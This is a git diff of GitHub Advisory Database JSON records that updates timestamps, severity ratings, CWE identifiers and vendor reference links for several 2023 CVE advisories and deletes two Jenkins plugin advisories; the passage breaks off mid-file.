diff --git a/advisories/unreviewed/2023/07/GHSA-hpqg-7fjp-436p/GHSA-hpqg-7fjp-436p.json b/advisories/unreviewed/2023/07/GHSA-hpqg-7fjp-436p/GHSA-hpqg-7fjp-436p.json index 5a9fe9314d1c4..c60c74b9d3550 100644 --- a/advisories/unreviewed/2023/07/GHSA-hpqg-7fjp-436p/GHSA-hpqg-7fjp-436p.json +++ b/advisories/unreviewed/2023/07/GHSA-hpqg-7fjp-436p/GHSA-hpqg-7fjp-436p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hpqg-7fjp-436p", - "modified": "2023-07-27T15:30:34Z", + "modified": "2024-02-04T09:30:41Z", "published": "2023-07-14T12:30:21Z", "aliases": [ "CVE-2023-2975" @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a83f0c958811f07e0d11dfc6b5a6a98edfd5bdc" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230725-0004/" @@ -50,7 +54,7 @@ "cwe_ids": [ "CWE-287" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-07-14T12:15:09Z" diff --git a/advisories/unreviewed/2023/07/GHSA-jx73-f6rp-8fxv/GHSA-jx73-f6rp-8fxv.json b/advisories/unreviewed/2023/07/GHSA-jx73-f6rp-8fxv/GHSA-jx73-f6rp-8fxv.json index cebc1b4e549f8..a9015b1d991bc 100644 --- a/advisories/unreviewed/2023/07/GHSA-jx73-f6rp-8fxv/GHSA-jx73-f6rp-8fxv.json +++ b/advisories/unreviewed/2023/07/GHSA-jx73-f6rp-8fxv/GHSA-jx73-f6rp-8fxv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jx73-f6rp-8fxv", - "modified": "2023-07-06T21:14:56Z", + "modified": "2024-02-07T12:30:25Z", "published": "2023-07-06T21:14:56Z", "aliases": [ "CVE-2022-47436" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-10T11:15:10Z" 
diff --git a/advisories/unreviewed/2023/07/GHSA-mfwc-hx97-869v/GHSA-mfwc-hx97-869v.json b/advisories/unreviewed/2023/07/GHSA-mfwc-hx97-869v/GHSA-mfwc-hx97-869v.json index bfa0159c6d194..6fbb758808963 100644 --- a/advisories/unreviewed/2023/07/GHSA-mfwc-hx97-869v/GHSA-mfwc-hx97-869v.json +++ b/advisories/unreviewed/2023/07/GHSA-mfwc-hx97-869v/GHSA-mfwc-hx97-869v.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0423" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0580" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2022-2127" diff --git a/advisories/unreviewed/2023/07/GHSA-p4m9-r3rr-cx92/GHSA-p4m9-r3rr-cx92.json b/advisories/unreviewed/2023/07/GHSA-p4m9-r3rr-cx92/GHSA-p4m9-r3rr-cx92.json index d07b646deaf8c..a483d2fdc85b9 100644 --- a/advisories/unreviewed/2023/07/GHSA-p4m9-r3rr-cx92/GHSA-p4m9-r3rr-cx92.json +++ b/advisories/unreviewed/2023/07/GHSA-p4m9-r3rr-cx92/GHSA-p4m9-r3rr-cx92.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p4m9-r3rr-cx92", - "modified": "2023-07-24T15:30:27Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-07-24T15:30:27Z", "aliases": [ "CVE-2023-3863" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240202-0002/" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5480" @@ -50,7 +54,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-07-24T15:15:09Z" diff --git a/advisories/unreviewed/2023/07/GHSA-pvjf-4hfg-wr84/GHSA-pvjf-4hfg-wr84.json b/advisories/unreviewed/2023/07/GHSA-pvjf-4hfg-wr84/GHSA-pvjf-4hfg-wr84.json deleted file mode 100644 index 74c78a687d920..0000000000000 --- a/advisories/unreviewed/2023/07/GHSA-pvjf-4hfg-wr84/GHSA-pvjf-4hfg-wr84.json +++ /dev/null 
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-pvjf-4hfg-wr84",
- "modified": "2023-07-31T18:30:21Z",
- "published": "2023-07-26T15:30:57Z",
- "aliases": [
- "CVE-2023-39152"
- ],
- "details": "Always-incorrect control flow implementation in Jenkins Gradle Plugin 2.8 may result in credentials not being masked (i.e., replaced with asterisks) in the build log in some circumstances.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39152"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-07-26/#SECURITY-3208"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/07/26/2"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-670"
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-07-26T14:15:10Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/07/GHSA-px39-5h8c-j3c8/GHSA-px39-5h8c-j3c8.json b/advisories/unreviewed/2023/07/GHSA-px39-5h8c-j3c8/GHSA-px39-5h8c-j3c8.json
deleted file mode 100644
index f7ba45f8e60d7..0000000000000
--- a/advisories/unreviewed/2023/07/GHSA-px39-5h8c-j3c8/GHSA-px39-5h8c-j3c8.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-px39-5h8c-j3c8",
- "modified": "2023-07-19T18:30:56Z",
- "published": "2023-07-19T18:30:56Z",
- "aliases": [
- "CVE-2023-32262"
- ],
- "details": "\nA potential vulnerability has been identified in the Micro Focus Dimensions CM Plugin for Jenkins. The vulnerability allows attackers with Item/Configure permission to access and capture credentials they are not entitled to.\nSee the following Jenkins security advisory for details: * https://www.jenkins.io/security/advisory/2023-06-14/ https://www.jenkins.io/security/advisory/2023-06-14/ \n\n\n\n\n",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32262"
- },
- {
- "type": "WEB",
- "url": "https://plugins.jenkins.io/dimensionsscm/"
- },
- {
- "type": "WEB",
- "url": "https://portal.microfocus.com/s/article/KM000019298"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-06-14/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-07-19T16:15:09Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/07/GHSA-r827-5p5r-w6f5/GHSA-r827-5p5r-w6f5.json b/advisories/unreviewed/2023/07/GHSA-r827-5p5r-w6f5/GHSA-r827-5p5r-w6f5.json
index fad8b97e1c709..26b8fac5feee7 100644
--- a/advisories/unreviewed/2023/07/GHSA-r827-5p5r-w6f5/GHSA-r827-5p5r-w6f5.json
+++ b/advisories/unreviewed/2023/07/GHSA-r827-5p5r-w6f5/GHSA-r827-5p5r-w6f5.json
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-r827-5p5r-w6f5", - "modified": "2023-07-06T19:24:05Z", + "modified": "2024-02-01T18:31:04Z", "published": "2023-07-06T19:24:05Z", "aliases": [ "CVE-2022-2808" ], "details": "Algan Yazılım Prens Student Information System product has an authenticated Insecure Direct Object Reference (IDOR) vulnerability. ", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-639" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2022-12-02T12:15:00Z" diff --git a/advisories/unreviewed/2023/07/GHSA-rjh9-46c2-6h7f/GHSA-rjh9-46c2-6h7f.json b/advisories/unreviewed/2023/07/GHSA-rjh9-46c2-6h7f/GHSA-rjh9-46c2-6h7f.json index 6c7ccb3bbe976..21d7b7daf078e 100644 --- a/advisories/unreviewed/2023/07/GHSA-rjh9-46c2-6h7f/GHSA-rjh9-46c2-6h7f.json +++ b/advisories/unreviewed/2023/07/GHSA-rjh9-46c2-6h7f/GHSA-rjh9-46c2-6h7f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rjh9-46c2-6h7f", - "modified": "2023-07-06T21:14:55Z", + "modified": "2024-02-01T18:31:06Z", "published": "2023-07-06T21:14:55Z", "aliases": [ "CVE-2023-25833" @@ -32,9 +32,10 @@ ], "database_specific": { "cwe_ids": [ + "CWE-79", "CWE-80" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-10T02:15:08Z" diff --git a/advisories/unreviewed/2023/07/GHSA-v4mv-7g6h-5vh8/GHSA-v4mv-7g6h-5vh8.json b/advisories/unreviewed/2023/07/GHSA-v4mv-7g6h-5vh8/GHSA-v4mv-7g6h-5vh8.json index e92c7a8113599..16c636516493d 100644 --- a/advisories/unreviewed/2023/07/GHSA-v4mv-7g6h-5vh8/GHSA-v4mv-7g6h-5vh8.json +++ b/advisories/unreviewed/2023/07/GHSA-v4mv-7g6h-5vh8/GHSA-v4mv-7g6h-5vh8.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v4mv-7g6h-5vh8", - "modified": "2024-01-25T21:32:11Z", + "modified": "2024-01-30T18:30:18Z", "published": "2023-07-24T18:30:44Z", "aliases": [ "CVE-2023-3812" @@ -81,6 +81,26 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0461" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0554" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0562" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0563" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0575" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0593" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-3812" diff --git a/advisories/unreviewed/2023/07/GHSA-vr3g-637q-4rh6/GHSA-vr3g-637q-4rh6.json b/advisories/unreviewed/2023/07/GHSA-vr3g-637q-4rh6/GHSA-vr3g-637q-4rh6.json index 481ccdea3d5f9..dc8738b328cd8 100644 --- a/advisories/unreviewed/2023/07/GHSA-vr3g-637q-4rh6/GHSA-vr3g-637q-4rh6.json +++ b/advisories/unreviewed/2023/07/GHSA-vr3g-637q-4rh6/GHSA-vr3g-637q-4rh6.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lore.kernel.org/netfilter-devel/20230705121627.GC19489@breakpoint.cc/T/" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0001/" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5453" diff --git a/advisories/unreviewed/2023/07/GHSA-xf5h-8pqw-mggq/GHSA-xf5h-8pqw-mggq.json b/advisories/unreviewed/2023/07/GHSA-xf5h-8pqw-mggq/GHSA-xf5h-8pqw-mggq.json index 25fee44c18d6b..a69a1c13c28f8 100644 --- a/advisories/unreviewed/2023/07/GHSA-xf5h-8pqw-mggq/GHSA-xf5h-8pqw-mggq.json +++ b/advisories/unreviewed/2023/07/GHSA-xf5h-8pqw-mggq/GHSA-xf5h-8pqw-mggq.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xf5h-8pqw-mggq", - "modified": "2023-07-06T21:14:55Z", + "modified": "2024-02-01T15:30:24Z", "published": "2023-07-06T21:14:55Z", "aliases": [ "CVE-2023-25832" @@ -34,7 +34,7 @@ "cwe_ids": [ "CWE-352" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-09T21:15:11Z" diff --git a/advisories/unreviewed/2023/08/GHSA-2965-8m5f-3hph/GHSA-2965-8m5f-3hph.json b/advisories/unreviewed/2023/08/GHSA-2965-8m5f-3hph/GHSA-2965-8m5f-3hph.json index 7a5ecbbc59bff..27b3c2ec53230 100644 --- a/advisories/unreviewed/2023/08/GHSA-2965-8m5f-3hph/GHSA-2965-8m5f-3hph.json +++ b/advisories/unreviewed/2023/08/GHSA-2965-8m5f-3hph/GHSA-2965-8m5f-3hph.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2965-8m5f-3hph", - "modified": "2023-08-22T15:30:20Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4368" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:13Z" diff --git a/advisories/unreviewed/2023/08/GHSA-2gmm-4f9j-mw4p/GHSA-2gmm-4f9j-mw4p.json b/advisories/unreviewed/2023/08/GHSA-2gmm-4f9j-mw4p/GHSA-2gmm-4f9j-mw4p.json index e68817ccf7ea2..ddf162fd76148 100644 --- a/advisories/unreviewed/2023/08/GHSA-2gmm-4f9j-mw4p/GHSA-2gmm-4f9j-mw4p.json +++ b/advisories/unreviewed/2023/08/GHSA-2gmm-4f9j-mw4p/GHSA-2gmm-4f9j-mw4p.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2gmm-4f9j-mw4p", - "modified": "2023-08-04T06:30:19Z", + "modified": "2024-01-31T18:31:17Z", "published": "2023-08-02T00:30:39Z", "aliases": [ "CVE-2023-3730" @@ -32,13 +32,17 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-01T23:15:31Z" diff --git a/advisories/unreviewed/2023/08/GHSA-3p85-44fv-28jc/GHSA-3p85-44fv-28jc.json b/advisories/unreviewed/2023/08/GHSA-3p85-44fv-28jc/GHSA-3p85-44fv-28jc.json index 23ab938498991..169560bb1e7af 100644 --- a/advisories/unreviewed/2023/08/GHSA-3p85-44fv-28jc/GHSA-3p85-44fv-28jc.json +++ b/advisories/unreviewed/2023/08/GHSA-3p85-44fv-28jc/GHSA-3p85-44fv-28jc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3p85-44fv-28jc", - "modified": "2023-08-22T18:31:31Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4366" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:13Z" diff --git a/advisories/unreviewed/2023/08/GHSA-4grv-wgvh-8x82/GHSA-4grv-wgvh-8x82.json b/advisories/unreviewed/2023/08/GHSA-4grv-wgvh-8x82/GHSA-4grv-wgvh-8x82.json index 44709cc3aaca0..b6c6cb82fd778 100644 
--- a/advisories/unreviewed/2023/08/GHSA-4grv-wgvh-8x82/GHSA-4grv-wgvh-8x82.json +++ b/advisories/unreviewed/2023/08/GHSA-4grv-wgvh-8x82/GHSA-4grv-wgvh-8x82.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4grv-wgvh-8x82", - "modified": "2023-08-23T00:30:25Z", + "modified": "2024-02-01T18:31:06Z", "published": "2023-08-16T15:30:17Z", "aliases": [ "CVE-2023-39975" @@ -33,6 +33,14 @@ "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230915-0014/" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0005/" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0008/" + }, { "type": "WEB", "url": "https://web.mit.edu/kerberos/www/advisories/" @@ -42,7 +50,7 @@ "cwe_ids": [ "CWE-415" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-16T15:15:11Z" diff --git a/advisories/unreviewed/2023/08/GHSA-543q-ph8q-rffh/GHSA-543q-ph8q-rffh.json b/advisories/unreviewed/2023/08/GHSA-543q-ph8q-rffh/GHSA-543q-ph8q-rffh.json index 3ecfa447905bc..decbcd5033bff 100644 --- a/advisories/unreviewed/2023/08/GHSA-543q-ph8q-rffh/GHSA-543q-ph8q-rffh.json +++ b/advisories/unreviewed/2023/08/GHSA-543q-ph8q-rffh/GHSA-543q-ph8q-rffh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-543q-ph8q-rffh", - "modified": "2023-08-21T18:31:23Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4361" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" 
@@ -46,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:12Z" diff --git a/advisories/unreviewed/2023/08/GHSA-5gvr-xr3v-5q9w/GHSA-5gvr-xr3v-5q9w.json b/advisories/unreviewed/2023/08/GHSA-5gvr-xr3v-5q9w/GHSA-5gvr-xr3v-5q9w.json index f987803723304..223731eebffc3 100644 --- a/advisories/unreviewed/2023/08/GHSA-5gvr-xr3v-5q9w/GHSA-5gvr-xr3v-5q9w.json +++ b/advisories/unreviewed/2023/08/GHSA-5gvr-xr3v-5q9w/GHSA-5gvr-xr3v-5q9w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5gvr-xr3v-5q9w", - "modified": "2023-08-24T06:30:16Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4360" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:12Z" diff --git a/advisories/unreviewed/2023/08/GHSA-5ppf-43g5-3hh2/GHSA-5ppf-43g5-3hh2.json b/advisories/unreviewed/2023/08/GHSA-5ppf-43g5-3hh2/GHSA-5ppf-43g5-3hh2.json index 2a6d3a9864c6f..311b465a2287b 100644 --- a/advisories/unreviewed/2023/08/GHSA-5ppf-43g5-3hh2/GHSA-5ppf-43g5-3hh2.json +++ b/advisories/unreviewed/2023/08/GHSA-5ppf-43g5-3hh2/GHSA-5ppf-43g5-3hh2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5ppf-43g5-3hh2", - "modified": "2023-08-22T18:31:31Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:32Z", "aliases": [ "CVE-2023-2312" 
@@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:10Z" diff --git a/advisories/unreviewed/2023/08/GHSA-5v4h-r3vp-3g7w/GHSA-5v4h-r3vp-3g7w.json b/advisories/unreviewed/2023/08/GHSA-5v4h-r3vp-3g7w/GHSA-5v4h-r3vp-3g7w.json index 260b4554e34c8..0608aa8a8ce1c 100644 --- a/advisories/unreviewed/2023/08/GHSA-5v4h-r3vp-3g7w/GHSA-5v4h-r3vp-3g7w.json +++ b/advisories/unreviewed/2023/08/GHSA-5v4h-r3vp-3g7w/GHSA-5v4h-r3vp-3g7w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5v4h-r3vp-3g7w", - "modified": "2023-08-04T06:30:19Z", + "modified": "2024-01-31T18:31:18Z", "published": "2023-08-02T00:30:39Z", "aliases": [ "CVE-2023-3737" @@ -32,13 +32,17 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-01T23:15:33Z" diff --git a/advisories/unreviewed/2023/08/GHSA-6994-5wq3-gpjv/GHSA-6994-5wq3-gpjv.json b/advisories/unreviewed/2023/08/GHSA-6994-5wq3-gpjv/GHSA-6994-5wq3-gpjv.json index bf27b5c44e837..f95047c79a836 100644 --- a/advisories/unreviewed/2023/08/GHSA-6994-5wq3-gpjv/GHSA-6994-5wq3-gpjv.json +++ b/advisories/unreviewed/2023/08/GHSA-6994-5wq3-gpjv/GHSA-6994-5wq3-gpjv.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6994-5wq3-gpjv", - "modified": "2023-08-31T18:30:28Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-29T21:30:21Z", "aliases": [ "CVE-2023-4572" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KUQ7CTX3W372X3UY56VVNAHCH6H2F4X3/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5487" @@ -50,7 +54,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-29T20:15:10Z" diff --git a/advisories/unreviewed/2023/08/GHSA-6cx7-2m7q-5fh3/GHSA-6cx7-2m7q-5fh3.json b/advisories/unreviewed/2023/08/GHSA-6cx7-2m7q-5fh3/GHSA-6cx7-2m7q-5fh3.json index f13b9de408536..3dc6b069d3799 100644 --- a/advisories/unreviewed/2023/08/GHSA-6cx7-2m7q-5fh3/GHSA-6cx7-2m7q-5fh3.json +++ b/advisories/unreviewed/2023/08/GHSA-6cx7-2m7q-5fh3/GHSA-6cx7-2m7q-5fh3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6cx7-2m7q-5fh3", - "modified": "2023-08-24T06:30:16Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4357" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:12Z" 
diff --git a/advisories/unreviewed/2023/08/GHSA-6f46-9vvr-v3j5/GHSA-6f46-9vvr-v3j5.json b/advisories/unreviewed/2023/08/GHSA-6f46-9vvr-v3j5/GHSA-6f46-9vvr-v3j5.json index de1864a57ca65..685e8c074ee5a 100644 --- a/advisories/unreviewed/2023/08/GHSA-6f46-9vvr-v3j5/GHSA-6f46-9vvr-v3j5.json +++ b/advisories/unreviewed/2023/08/GHSA-6f46-9vvr-v3j5/GHSA-6f46-9vvr-v3j5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6f46-9vvr-v3j5", - "modified": "2023-08-04T06:30:19Z", + "modified": "2024-01-31T18:31:17Z", "published": "2023-08-02T00:30:39Z", "aliases": [ "CVE-2023-3732" @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/174223/Chrome-IPCZ-FragmentDescriptors-Missing-Validation.html" @@ -42,7 +46,7 @@ "cwe_ids": [ "CWE-787" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-01T23:15:32Z" diff --git a/advisories/unreviewed/2023/08/GHSA-6j3m-7hm6-qjrx/GHSA-6j3m-7hm6-qjrx.json b/advisories/unreviewed/2023/08/GHSA-6j3m-7hm6-qjrx/GHSA-6j3m-7hm6-qjrx.json index 3346513775d65..f4f1c21c2f845 100644 --- a/advisories/unreviewed/2023/08/GHSA-6j3m-7hm6-qjrx/GHSA-6j3m-7hm6-qjrx.json +++ b/advisories/unreviewed/2023/08/GHSA-6j3m-7hm6-qjrx/GHSA-6j3m-7hm6-qjrx.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5467" diff --git a/advisories/unreviewed/2023/08/GHSA-6rcq-9f69-78p4/GHSA-6rcq-9f69-78p4.json b/advisories/unreviewed/2023/08/GHSA-6rcq-9f69-78p4/GHSA-6rcq-9f69-78p4.json index cc2a07a9bdaf3..ccabc6cf087b5 100644 
--- a/advisories/unreviewed/2023/08/GHSA-6rcq-9f69-78p4/GHSA-6rcq-9f69-78p4.json +++ b/advisories/unreviewed/2023/08/GHSA-6rcq-9f69-78p4/GHSA-6rcq-9f69-78p4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6rcq-9f69-78p4", - "modified": "2023-08-22T18:31:31Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4365" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:13Z" diff --git a/advisories/unreviewed/2023/08/GHSA-7332-j628-x48x/GHSA-7332-j628-x48x.json b/advisories/unreviewed/2023/08/GHSA-7332-j628-x48x/GHSA-7332-j628-x48x.json index 53bdb29d16eab..959210829cd52 100644 --- a/advisories/unreviewed/2023/08/GHSA-7332-j628-x48x/GHSA-7332-j628-x48x.json +++ 